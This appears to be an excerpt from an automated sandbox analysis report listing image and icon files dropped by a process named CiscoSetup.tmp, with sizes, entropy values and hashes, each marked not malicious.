                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1807
                                                                                                                                                                                                  Entropy (8bit):7.846793911413473
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24:M3uM24lXN+maawwFvEk9PMjKHcdAJ5xo+n7R/0+5GpxwGjQaTNn7ohEoGCL5F2lr:M+VU3vVsk9kcqE7RN+x/BohRnG
                                                                                                                                                                                                  MD5:536C911881523B9F8402A481881992A0
                                                                                                                                                                                                  SHA1:2748A03D65DA7D6B4A95ACBDEB6ECD6F409A0ABF
                                                                                                                                                                                                  SHA-256:246B7E52A41AA64365D84C7DA73FD20C27B8C825C61394AE8C775DBD9BF5B668
                                                                                                                                                                                                  SHA-512:608DFEC9C7980707B9947F3CFB8BEF93FDF1D6D5B908E25888BCA0C7CE83C70F23AF87798F38E364E75FA05C89523028B5742E3084E6401068A7DE6BC5BF90E4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4455
                                                                                                                                                                                                  Entropy (8bit):7.908038022091361
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29723
                                                                                                                                                                                                  Entropy (8bit):7.971507308971378
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 300 x 40, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1601
                                                                                                                                                                                                  Entropy (8bit):6.01754566314674
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.010961844615086
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8594
                                                                                                                                                                                                  Entropy (8bit):7.973082494080156
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 16 x 12, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3880
                                                                                                                                                                                                  Entropy (8bit):6.742220289284142
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):417
                                                                                                                                                                                                  Entropy (8bit):7.261808950496785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1702
                                                                                                                                                                                                  Entropy (8bit):7.836409910643584
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):3638
                                                                                                                                                                                                  Entropy (8bit):7.889316799889741
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTH6gOjEda8+nWKHD:TSDS0tKg9E05THXOodrpKHD
                                                                                                                                                                                                  MD5:ADDC960D6A70987420055E0DEBCF4250
                                                                                                                                                                                                  SHA1:AF1D0C9386C1ADC774FC167F69B89637F414BED9
                                                                                                                                                                                                  SHA-256:B19F731C03166DB50BA5E0F0AD70A48E1223E7DD57B051A3DFB8CC23FBFAB482
                                                                                                                                                                                                  SHA-512:8F6D2CFA6BF8406CB2954029C0A43F3871C2C35E19CC0580925D4E847BFC6377749AB2A3FBF8CA030D55AEC3729AED6F54F7D7534A593A24927C8E274A811E1D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):26026
                                                                                                                                                                                                  Entropy (8bit):7.927985837095832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:TKQua9HUsr5RRxO5oEt9jwIZmYCEHme0KV:+Xa9RLxO5o29jNGEGk
                                                                                                                                                                                                  MD5:5DC7A6BEE91DE8331C802B1647F5AD10
                                                                                                                                                                                                  SHA1:D9F8150235EF917E6884AA963C292530AE7ED599
                                                                                                                                                                                                  SHA-256:4D9B3A95A941BD32E42171770195872958DB56A6C2CB6FAE664500E947911149
                                                                                                                                                                                                  SHA-512:BC32B66AD44C88DB95995B08A4A2E7D420035CC02318756AD10F854B884B613C8CEE3017E7708B7E4865B06961B7292CBD91B3091B0BC61889A71A06C5A17E98
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9736
                                                                                                                                                                                                  Entropy (8bit):7.95835565935799
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uGw9FbNic2CTLMZgb0OeuEqR0+zipNb19+MUs2b4uLbFv7MLlELHz5FijB:uZ95jOAdE+0+mpNB9dObfR4LiLHz5QjB
                                                                                                                                                                                                  MD5:64C1592AB32B98889AFDB7F216B3A535
                                                                                                                                                                                                  SHA1:9DA1BF63D0E9CCF65BA0C72E615099AD30DDB2EB
                                                                                                                                                                                                  SHA-256:B649B2B24F635758C6B424EBADA07097ABB56CE73E46F056268004D79575AA8F
                                                                                                                                                                                                  SHA-512:CA8376AEB64FE49CE253BEE7F949AEBFDB6C1EAD6270C739B09751CEEA313407F7AABBA7388E4ABFA53A48A322D827EF6D4FF1D458C3FB815239407646D53C84
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):431993
                                                                                                                                                                                                  Entropy (8bit):4.565786626694248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                                                                                  MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                                                                                  SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                                                                                  SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                                                                                  SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.4144936482461397
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:xLEWi6fEolR+vy+f7I8QbmvTn+3vCpK+hxZBBBpkbGgo2uo:xLV7EolbUISLn+3UBZBBBpkbGg6o
                                                                                                                                                                                                  MD5:68A2EA89135A31CE9E3E598F981433E0
                                                                                                                                                                                                  SHA1:1E2DABDFE730EAFD9A21F09C0E8E7F84E159E115
                                                                                                                                                                                                  SHA-256:73A199B9058AE8665DE3AD7792A7EE5DF7ADD2A4F2D8EFF49D81F221E8AFF85E
                                                                                                                                                                                                  SHA-512:CBCF48A63EA4CDC853950D2240B216EC8037E5CF0DFA9DA590C9F3749D5090406CA00CFCC5F844A7024ADD80B113F49F2F7D7F3D739F813360DA47720418DAC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4052
                                                                                                                                                                                                  Entropy (8bit):7.943954771539964
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:YVzyamWl9ZWA1xj7kdJwie8o1NqPw1AT2Z1OHXe:q5t9ZWmlsy9qPw1AT2Z2e
                                                                                                                                                                                                  MD5:0356D0A27BC2E9B55F5603D0373CED4C
                                                                                                                                                                                                  SHA1:7572FB4DC3B1CEF66F38F68A29093D3FBE706A5E
                                                                                                                                                                                                  SHA-256:E5427AAA99BFC3CC3886351EC9B7C4C524799CF4A0DE0E0CF6D8DE3C0DFB8743
                                                                                                                                                                                                  SHA-512:6BB3E1168712BCAE7F5B67F92A60B58B74162A01225AE264B0A72CDC2CE0C3943A7E9AE47406AFBAE44C25870A877C5EE83142C40EE4BFA6C57DEC495B1C53BE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12780
                                                                                                                                                                                                  Entropy (8bit):7.975972884511595
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:eS01CYt7F9/5i2XPFK02VBVDNP/RqOMGkw9j:e1th95PqjP/E1A
                                                                                                                                                                                                  MD5:1CE2626120CD6B69683255C71552896B
                                                                                                                                                                                                  SHA1:4230DF12A00E6B13CAB39EFB1C44DCBF5B656087
                                                                                                                                                                                                  SHA-256:B55ABBF6754B131C33947DCA3511D219B2AB2DC5D7E8945BF3C6A2E9FB0FEB23
                                                                                                                                                                                                  SHA-512:A197A76FB7DB9FEF68E3A49DE4C134EFB41472773F323BF4F8AB3B610174FD75C15848BB42CFC2D4240D72EFA66FF4CFFE02DDA28323279C87C7019E167F724B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):7.339402871750466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                                                                                  MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                                                                                  SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                                                                                  SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                                                                                  SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.5904244181066343
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:qp/EF2cJeBcktRYgD9qsSyGrnPblkbGgmo:YccB8lPbGHB
                                                                                                                                                                                                  MD5:A1C46D32AA7BCD14A8DB10005E23B885
                                                                                                                                                                                                  SHA1:8859CD29B7D6A9D645C3B09D8AFAB041D3BB7A37
                                                                                                                                                                                                  SHA-256:66DAAB72327F0E98FC3006DA7B0F957901285993388BDE25D6149464A98C9442
                                                                                                                                                                                                  SHA-512:16CC5F81EC30BC027D6C3268383463968DD9E2C0A0A3BBDA8059BF8DC6A99853ED27CD1E1BD955ACF2F98B5B0693D5A2AEDCC69261F2E06B065ED11684179AD9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16443
                                                                                                                                                                                                  Entropy (8bit):7.760065707691873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                                                                                  MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                                                                                  SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                                                                                  SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                                                                                  SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):11585
                                                                                                                                                                                                  Entropy (8bit):7.961332304899258
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:uoknxnFWLkyZS1HwgrTfSTVQV1r+2HPOSm9HRNxe6S1ipOvyYh95kRwjtbul4Ljh:uo4xAoKoHuVuHPOSmdfxy1ipwN5bjtbB
                                                                                                                                                                                                  MD5:FAA694AA17D61EAC6803E15397AE2C15
                                                                                                                                                                                                  SHA1:D3FBA06AA2794D460DEF2997E84EC7CBE49A83AB
                                                                                                                                                                                                  SHA-256:9AC4F60BF1A10CD08529427AAA1C419F5C4C1412D23EE5764B9EDACC3558A980
                                                                                                                                                                                                  SHA-512:5B2586AC90E5366C236AE02181172842CFDC311495157477ACB388A50CA56B5FB1EE532B753323566937012A54027DC53DE803DB4178F6F85618ADA4B015308C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29327
                                                                                                                                                                                                  Entropy (8bit):7.967732566337996
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:kfiUT6EuEADj9MKT8NYMSNQ0Ksn1GStodN2AG1:kfTGGYRKK1GStodNw
                                                                                                                                                                                                  MD5:A0FE71E2020412BD9FFEB2712628DAD0
                                                                                                                                                                                                  SHA1:33EBF21B46A1742A46DEEE2EADB0F714B4F64959
                                                                                                                                                                                                  SHA-256:3AF5729F9A5902B409FD0D79BA1B04AF2ABDB25BCB4750F235BD61DC2EEE7C77
                                                                                                                                                                                                  SHA-512:D4886F29044F3B6A1FB900AF1973362B6822085544ED65877B2F555B360E494912AAFFDA58E49C8A91ED541F9D18482A1811C9350074797416CC8ECD06CC1863
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5558
                                                                                                                                                                                                  Entropy (8bit):4.450533821817726
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vcn7ngbW2IU8R9Lq+LhfSnuX31xEqxpkg:E74IU8R9LqMTFxz
                                                                                                                                                                                                  MD5:EAF0F00DA8BB1D384B8A5BB3B82D0A54
                                                                                                                                                                                                  SHA1:2E7021D20D962F4568A51757B2D9B7408624740E
                                                                                                                                                                                                  SHA-256:86D5102E01D6D29D5AEE6E87E827B8C624D7B552035C9AFDB0BE2B120E4A553F
                                                                                                                                                                                                  SHA-512:57358DEA1B8A75A8FEEE29F9D83931D65672B228B93CE6C9CFEEBA3C77FD9FDB8D7B7D4A1F3188D8CBC2FEBF8B427F574791E6210580499788FF101641C01854
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8950
                                                                                                                                                                                                  Entropy (8bit):7.969730039207073
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:p96ObyGv4LCovtazAkU/bm8oT+4UObs9KhHU1gL3c2/Rqw:tbtuCovtazCDdxObJ5UM3hh
                                                                                                                                                                                                  MD5:4F8EBA018E164B7A5FFDA205576989E8
                                                                                                                                                                                                  SHA1:56669FFFC614C2577370B0EF84EA6EA4FFE89858
                                                                                                                                                                                                  SHA-256:815EACDBC62FED323EB3D0BBAD4596C0D699862A66258A4F994B78CE520389A1
                                                                                                                                                                                                  SHA-512:F9CBDEE29FD372DEA72C6039E705A192B2C751927490B811317CE74A56DBEF1B4C17D05D1CC29A32F060C6A761D93CDB5D2AF6C76853427F5341D7C6DA4F44E7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399779
                                                                                                                                                                                                  Entropy (8bit):7.9639437199622165
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                                                                                  MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                                                                                  SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                                                                                  SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                                                                                  SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51094
                                                                                                                                                                                                  Entropy (8bit):7.977081753425093
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                                                                                  MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                                                                                  SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                                                                                  SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                                                                                  SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12258
                                                                                                                                                                                                  Entropy (8bit):7.976396258951981
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Fkocto5a0L5W0WyUW8l4JGfcRWyryRN77YK/CPEyei5rTiKb9bdgih7OnT:Fkocto5zW0dNaAfRxKK80dbd5hanT
                                                                                                                                                                                                  MD5:33B3721B931071C69A9ECDFDAEF39F29
                                                                                                                                                                                                  SHA1:EE4DD7077CFDA9C0A2FE594CE8C9496EF23CA2E3
                                                                                                                                                                                                  SHA-256:55FC14B826D7F3C9F47F14CDBDAE488F1D4FE3678CD95BBBF7E643436F382D37
                                                                                                                                                                                                  SHA-512:B8E1843F2F08ADF93F7277FFAF8DD5299F7F5FCFA38AD15EC54422D4E3048822E15BB9D0B682D1728B6E4064CAE32222998ED48D41310FE7D9C58116D6D9E108
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):4.044905068349432
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:m/CRZkMiOjTrP2GqirkNv05M36iJpx8wpeXlUA9S5Sxgo2vo:mqcaTrP1zr804FjiUA9s4g7o
                                                                                                                                                                                                  MD5:1AE447E7E6E48D922E20DACEBEABF6B7
                                                                                                                                                                                                  SHA1:405E8A92B647B62F189B88AF58F1473C53F09991
                                                                                                                                                                                                  SHA-256:40107A62ABD4DE28E722EC92905913E24873CD9E10C21CEE50698949AB76C358
                                                                                                                                                                                                  SHA-512:F703E7D8AE70589C75F722BE8D64C9D136A524ADDD3AE39D0ED94C32C632EBB2E0EECB61C08342564AE42445B4146E10CED0ED4EE783DDF3785CC6D7AA124440
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.612237043911612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                                                                                  MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                                                                                  SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                                                                                  SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                                                                                  SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28939
                                                                                                                                                                                                  Entropy (8bit):7.960017526195935
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                                                                                  MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                                                                                  SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                                                                                  SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                                                                                  SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.7071518309363354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                                                                                  MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                                                                                  SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                                                                                  SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                                                                                  SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                                                                                  Malicious:false
